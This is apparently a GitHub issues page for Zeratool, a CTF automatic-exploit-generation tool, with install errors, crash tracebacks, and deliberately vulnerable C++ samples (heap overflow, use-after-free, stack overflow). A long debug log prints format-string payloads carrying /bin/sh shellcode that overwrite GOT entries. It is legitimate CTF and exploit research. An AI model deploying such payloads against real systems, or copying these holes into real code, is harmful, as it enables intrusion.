christhecoolhut / zeratool

Automatic Exploit Generation (AEG) and remote flag capture for exploitable CTF problems

License: GNU General Public License v3.0

Shell 1.34% Python 95.70% Makefile 1.30% C 1.66%
angr aeg shellcode buffer-overflow solver ctf

zeratool's People

Contributors

aidaip, christhecoolhut, inndy, sourcekris, wseng


zeratool's Issues

source code

About Automatic Exploit Generation (this paper): do you have its source code?

can't install it via pip

> pip --version       
pip 20.3.4 from /usr/local/lib/python2.7/dist-packages/pip (python 2.7)

error message

> pip install zeratool
ERROR: Could not find a version that satisfies the requirement gitdb>=4.0.1 (from gitdb2>=2.0.0->GitPython==2.1.9->angr->zeratool) (from versions: 0.5.0, 0.5.1, 0.5.2, 0.5.3, 0.5.4, 0.6.0, 0.6.1, 0.6.2, 0.6.3, 0.6.4)
ERROR: No matching distribution found for gitdb>=4.0.1 (from gitdb2>=2.0.0->GitPython==2.1.9->angr->zeratool)

doesn't work

zerapwn.py challenges/ret -u ctf.hackucf.org -p 9003
[+] Checking pwn type...
[+] Checking for overflow pwn type...
ERROR | 2021-11-18 19:06:04,246 | angr.project | Could not find symbol rand
ERROR | 2021-11-18 19:06:04,247 | angr.project | Could not find symbol srand
WARNING | 2021-11-18 19:06:04,248 | angr.simos.simos | stdin is constrained to 300 bytes (has_end=True). If you are only providing the first 300 bytes instead of the entire stdin, please use stdin=SimFileStream(name='stdin', content=your_first_n_bytes, has_end=False).
WARNING | 2021-11-18 19:06:08,844 | angr.engines.successors | Exit state has over 256 possible solutions. Likely unconstrained; skipping. <BV32 Reverse(input_3_2400[1759:1728])>
Found vulnerable state.
[+] Vulnerable path found b'\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xef\xbe\xad\xde\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9CCCC\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xdd\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
[+] Getting binary protections
[*] '/home/ubuntu/ctf/Zeratool/challenges/ret'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
RPATH: b'/usr/local/lib:$ORIGIN'
INFO | 2021-11-18 19:06:09,019 | pwnlib.elf.elf | '/home/ubuntu/ctf/Zeratool/challenges/ret'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
RPATH: b'/usr/local/lib:$ORIGIN'
Traceback (most recent call last):
  File "/root/virtualenvs/zeratool/bin/zerapwn.py", line 129, in <module>
    main()
  File "/root/virtualenvs/zeratool/bin/zerapwn.py", line 90, in main
    properties["win_functions"] = winFunctionDetector.getWinFunctions(args.file)
  File "/root/virtualenvs/zeratool/lib/python3.7/site-packages/zeratool/winFunctionDetector.py", line 13, in getWinFunctions
    functions = [func for func in json.loads(r2.cmd("aflj"))]
  File "/usr/local/src/python37/lib/python3.7/json/__init__.py", line 348, in loads
    return _default_decoder.decode(s)
  File "/usr/local/src/python37/lib/python3.7/json/decoder.py", line 337, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())
  File "/usr/local/src/python37/lib/python3.7/json/decoder.py", line 355, in raw_decode
    raise JSONDecodeError("Expecting value", s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)

Challenges (stack, heap and UAF)

Hi!

Here you have vulnerable proofs of concept of a heap-based buffer overflow, a stack buffer overflow and a use after free.

To compile:

g++ heap.c -o heap
g++ uaf.c -o uaf
g++ stack.c -o stack

Is it possible that Zeratool could successfully exploit these three cases?

peto@ubuntu:~/Desktop/challenges$ cat heap.c
#include <iostream>
#include <fstream>
#include <cstring>
#include <cstdlib>
#define BUFSIZE 10
using namespace std;

int main(int argc, char* argv[])
{
    if (argc > 1) {
        cout << "argv[1] = " << argv[1] << endl;
    } else {
        cout << "No file name entered. Exiting...";
        return -1;
    }
    ifstream myReadFile;
    myReadFile.open(argv[1]);
    char output[8192];
    if (myReadFile.is_open()) {
        while (!myReadFile.eof()) {

            myReadFile >> output;

            char *buf;
            buf = (char *)malloc(sizeof(char)*BUFSIZE);
            /* heap overflow: output may be far longer than the 10-byte chunk */
            strcpy(buf, output);

        }
    }
    myReadFile.close();
    return 0;
}

peto@ubuntu:~/Desktop/challenges$ cat uaf.c
#include <iostream>
#include <fstream>
#include <cstring>
#include <cstdlib>
#define BUFSIZER1 10
using namespace std;

int main(int argc, char* argv[])
{
    if (argc > 1) {
        cout << "argv[1] = " << argv[1] << endl;
    } else {
        cout << "No file name entered. Exiting...";
        return -1;
    }
    ifstream myReadFile;
    myReadFile.open(argv[1]);
    char output[8192];
    if (myReadFile.is_open()) {
        while (!myReadFile.eof()) {

            myReadFile >> output;
            char *buf1R1;
            buf1R1 = (char *) malloc(BUFSIZER1);
            free(buf1R1);
            /* use after free: the chunk is written after it was released */
            strcpy(buf1R1, output);
        }
    }
    myReadFile.close();
    return 0;
}

peto@ubuntu:~/Desktop/challenges$ cat stack.c
#include <iostream>
#include <fstream>

using namespace std;

int main(int argc, char* argv[])
{
    if (argc > 1) {
        cout << "argv[1] = " << argv[1] << endl;
    } else {
        cout << "No file name entered. Exiting...";
        return -1;
    }
    ifstream myReadFile;
    myReadFile.open(argv[1]);
    char output[10];
    if (myReadFile.is_open()) {
        while (!myReadFile.eof()) {

            /* stack overflow: operator>> has no width limit on the 10-byte buffer */
            myReadFile >> output;
            cout<<output;

        }
    }
    myReadFile.close();
    return 0;
}

Crash while running and never pwn

Hello, while running the Zerapwn sample or a binary that I made, the tool always ends up crashing. Here is the error:

Traceback (most recent call last):
  File "/home/XXX/anaconda3/bin/zerapwn.py", line 173, in <module>
    main()
  File "/home/XXX/anaconda3/bin/zerapwn.py", line 156, in main
    properties["pwn_type"]["results"] = formatExploiter.exploitFormat(
  File "/home/XXX/anaconda3/lib/python3.9/site-packages/zeratool/formatExploiter.py", line 86, in exploitFormat
    rediscoverAndExploit(binary_name, properties, stack_position)
  File "/home/XXX/anaconda3/lib/python3.9/site-packages/zeratool/formatExploiter.py", line 121, in rediscoverAndExploit
    reg_values = getRegValues(binary_name, entryAddr)
  File "/home/XXX/anaconda3/lib/python3.9/site-packages/zeratool/radare_helper.py", line 22, in getRegValues
    regs = dict([(x["reg"], int(x["value"], 16)) for x in regs])
  File "/home/XXX/anaconda3/lib/python3.9/site-packages/zeratool/radare_helper.py", line 22, in <listcomp>
    regs = dict([(x["reg"], int(x["value"], 16)) for x in regs])
ValueError: invalid literal for int() with base 16: '1PSI'

From what I've seen, the issue comes from rflags.
Thus, I think this could fix the crash:
regs = dict([(x["reg"], int(x["value"], 16)) for x in regs if x["reg"] != "rflags"])

Your tool is really great, so I hope you will fix that, or, in case it turns out to be an issue with my computer, that you'll help me fix it.

Using 'crash' file to exploit BoF

Assuming, as an example, an application that reads files, how could it be analyzed with Zeratool using the 'crash' file to exploit the buffer overflow?

Example: filereadapp /dir/mycrashfileBoF.png

Thanks!

r2pipe is no longer supported for python 2

I have trouble installing zeratool, as zeratool uses r2pipe but the latest version of r2pipe no longer supports Python 2.
While installing r2pipe:

ERROR: Command errored out with exit status 1:
     command: /home/manish/virtualenvs/zeratool/bin/python -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-Rmigan/r2pipe/setup.py'"'"'; __file__='"'"'/tmp/pip-install-Rmigan/r2pipe/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' egg_info --egg-base /tmp/pip-pip-egg-info-Qp3Wkt
         cwd: /tmp/pip-install-Rmigan/r2pipe/
    Complete output (9 lines):
    Traceback (most recent call last):
      File "<string>", line 1, in <module>
      File "/tmp/pip-install-Rmigan/r2pipe/setup.py", line 3, in <module>
        import r2pipe
      File "r2pipe/__init__.py", line 38, in <module>
        from r2pipe.open_sync import open
      File "r2pipe/open_sync.py", line 15, in <module>
        from urllib.error import URLError
    ImportError: No module named error
    ----------------------------------------
ERROR: Command errored out with exit status 1: python setup.py egg_info Check the logs for full command output.

So it would be better if install.sh specified r2pipe==1.4.2, which supports Python 2, and the package ropper should also be installed for zeratool to work.

Can not detect vulnerability caused by gets()

When I test Zeratool on my own binary, which includes a BOF vulnerability caused by gets(), it cannot detect it.
I am not familiar with symbolic execution. I debugged it and found that gets() does not cause an unconstrained state.
Is there any other way to solve this problem?
The core code is shown below.

.text:080484FD                 public func1
.text:080484FD func1           proc near               ; CODE XREF: main+35↑p
.text:080484FD
.text:080484FD s               = byte ptr -0Ch
.text:080484FD
.text:080484FD                 push    ebp
.text:080484FE                 mov     ebp, esp
.text:08048500                 sub     esp, 18h
.text:08048503                 sub     esp, 0Ch
.text:08048506                 lea     eax, [ebp+s]
.text:08048509                 push    eax             ; s
.text:0804850A                 call    _gets
.text:0804850F                 add     esp, 10h
.text:08048512                 nop
.text:08048513                 leave
.text:08048514                 retn
.text:08048514 func1           endp

CLECompatibilityError "Unable to find a loader backend for %s"

I've installed Zeratool on a new Kali install. I have r2 installed. I installed via 'pip install zeratool'.

I receive the same CLECompatibilityError for .py and .c files, both my own as well as those in /tests.

└─$ zerapwn.py test.py
Traceback (most recent call last):
  File "/home/kali/gitclones/Zeratool/venv/bin/zerapwn.py", line 4, in <module>
    __import__('pkg_resources').run_script('zeratool==2.2', 'zerapwn.py')
  File "/home/kali/gitclones/Zeratool/venv/lib/python3.10/site-packages/pkg_resources/__init__.py", line 656, in run_script
    self.require(requires)[0].run_script(script_name, ns)
  File "/home/kali/gitclones/Zeratool/venv/lib/python3.10/site-packages/pkg_resources/__init__.py", line 1460, in run_script
    exec(script_code, namespace, namespace)
  File "/home/kali/gitclones/Zeratool/venv/lib/python3.10/site-packages/zeratool-2.2-py3.10.egg/EGG-INFO/scripts/zerapwn.py", line 246, in <module>
  File "/home/kali/gitclones/Zeratool/venv/lib/python3.10/site-packages/zeratool-2.2-py3.10.egg/EGG-INFO/scripts/zerapwn.py", line 111, in main
  File "/home/kali/gitclones/Zeratool/venv/lib/python3.10/site-packages/zeratool-2.2-py3.10.egg/zeratool/inputDetector.py", line 12, in checkInputType
    p = angr.Project(binary_name)
  File "/home/kali/gitclones/Zeratool/venv/lib/python3.10/site-packages/angr-9.2.19-py3.10-linux-x86_64.egg/angr/project.py", line 138, in __init__
    self.loader = cle.Loader(self.filename, concrete_target=concrete_target, **load_options)
  File "/home/kali/gitclones/Zeratool/venv/lib/python3.10/site-packages/cle/loader.py", line 133, in __init__
    self.initial_load_objects = self._internal_load(main_binary, *preload_libs, *force_load_libs, preloading=(main_binary, *preload_libs))
  File "/home/kali/gitclones/Zeratool/venv/lib/python3.10/site-packages/cle/loader.py", line 689, in _internal_load
    obj = self._load_object_isolated(main_spec)
  File "/home/kali/gitclones/Zeratool/venv/lib/python3.10/site-packages/cle/loader.py", line 866, in _load_object_isolated
    raise CLECompatibilityError("Unable to find a loader backend for %s. Perhaps try the 'blob' loader?" % spec)
cle.errors.CLECompatibilityError: Unable to find a loader backend for /home/kali/shared/test.py. Perhaps try the 'blob' loader?

TypeError: Unexpected keyword arguments: immutable

(angr) angr@2ecf15fad308:/tmp/Zeratool-master$ python3 zeratool.py challenges/ret -u ctf.hackucf.org -p 9003
[+] Checking pwn type...
[+] Checking for overflow pwn type...
Traceback (most recent call last):
  File "zeratool.py", line 80, in <module>
    main()
  File "zeratool.py", line 38, in main
    properties['pwn_type'] = overflowDetector.checkOverflow(args.file,inputType=properties['input_type'])
  File "/tmp/Zeratool-master/lib/overflowDetector.py", line 34, in checkOverflow
    simgr = p.factory.simgr(state, immutable=False, save_unconstrained=True)
  File "/home/angr/angr-dev/angr/angr/factory.py", line 198, in simgr
    return self.simulation_manager(*args, **kwargs)
  File "/home/angr/angr-dev/angr/angr/factory.py", line 192, in simulation_manager
    return SimulationManager(self.project, active_states=thing, **kwargs)
  File "/home/angr/angr-dev/angr/angr/sim_manager.py", line 108, in __init__
    raise TypeError("Unexpected keyword arguments: " + " ".join(kwargs))
TypeError: Unexpected keyword arguments: immutable

Issue about "hard_format" binary exploitation

I have tried the brand new pull request on the original repo, and it works fine for me!

But I still have some trouble exploiting the "hard_format" binary, while the others can be exploited successfully. Although I have run this script dozens of times, it didn't work.

The log is pretty long:

(zeratool) aaa@aaa-ubuntu1604:~/Zeratool$ python zeratool.py challenges/hard_format
[+] Checking input type
[+] Checking pwn type...
[+] Checking for overflow pwn type...
[+] Checking for format string pwn type...
[+] Found symbolic buffer at position 0 of length 49
[+] Vulnerable path found %x_%
[+] Triggerable with STDIN : %x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x




[+] Getting binary protections
[+] Checking for flag leak
[~] Odd length string detected... Skipping
[~] Odd length string detected... Skipping
[~] Odd length string detected... Skipping
[~] Odd length string detected... Skipping
[+] Returned ,*%x_%0$08x_%1$08x_%2$08x_%3$08x_%4$08x_%5$08x8x_%22$08x_%23$08x_%24$08x_%25$08x_%26$08x_%27$08x_%28$08x_%8x_%46$08x_%47$08x



t***>*><**@b*
[~] Locating buffer stack location
aaaa_0000012c_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx



aaaa_2aa615a0_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx



aaaa_00000001_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx



aaaa_61616161_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx



[+] Found stack location at 4
[+] Binary does not have NX
[+] Overwriting GOT entry to point to shellcode
Process with PID 12828 started...
= attach 12828 12828
bin.baddr 0x08048000
Using 0x8048000
asm.bits 32
glibc.fc_offset = 0x00148
Continue until 0x08048380 using 1 bpsize
hit breakpoint at: 0x8048380
[+] Found symbolic buffer at position 0 of length 49
[+] Overwiting __gmon_start__ at 0x8049734
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13007 started...
= attach 13007 13007
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'4\x97\x04\x086\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'4\x97\x04\x086\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting stdin at 0x8049760
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'`\x97\x04\x08b\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'`\x97\x04\x08b\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x97\x04\x08b\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13130 started...
= attach 13130 13130
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'`\x97\x04\x08b\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x97\x04\x08b\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting exit at 0x804974c
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'L\x97\x04\x08N\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'L\x97\x04\x08N\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'L\x97\x04\x08N\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13250 started...
= attach 13250 13250
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'L\x97\x04\x08N\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'L\x97\x04\x08N\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting printf at 0x8049744
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'D\x97\x04\x08F\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'D\x97\x04\x08F\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'D\x97\x04\x08F\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13370 started...
= attach 13370 13370
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'D\x97\x04\x08F\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'D\x97\x04\x08F\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting fgets at 0x8049748
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'H\x97\x04\x08J\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'H\x97\x04\x08J\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'H\x97\x04\x08J\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13488 started...
= attach 13488 13488
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'H\x97\x04\x08J\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'H\x97\x04\x08J\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting __libc_start_main at 0x8049750
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'P\x97\x04\x08R\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'P\x97\x04\x08R\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'P\x97\x04\x08R\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13610 started...
= attach 13610 13610
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'P\x97\x04\x08R\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'P\x97\x04\x08R\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Found symbolic buffer at position 0 of length 49
[+] Overwiting __gmon_start__ at 0x8049734
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'4\x97\x04\x086\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'4\x97\x04\x086\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13729 started...
= attach 13729 13729
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting stdin at 0x8049760
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'`\x97\x04\x08b\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'`\x97\x04\x08b\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13791 started...
= attach 13791 13791
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting exit at 0x804974c
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'L\x97\x04\x08N\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'L\x97\x04\x08N\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13853 started...
= attach 13853 13853
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting printf at 0x8049744
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'D\x97\x04\x08F\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'D\x97\x04\x08F\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13915 started...
= attach 13915 13915
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting fgets at 0x8049748
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'H\x97\x04\x08J\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'H\x97\x04\x08J\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13977 started...
= attach 13977 13977
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting __libc_start_main at 0x8049750
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'P\x97\x04\x08R\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
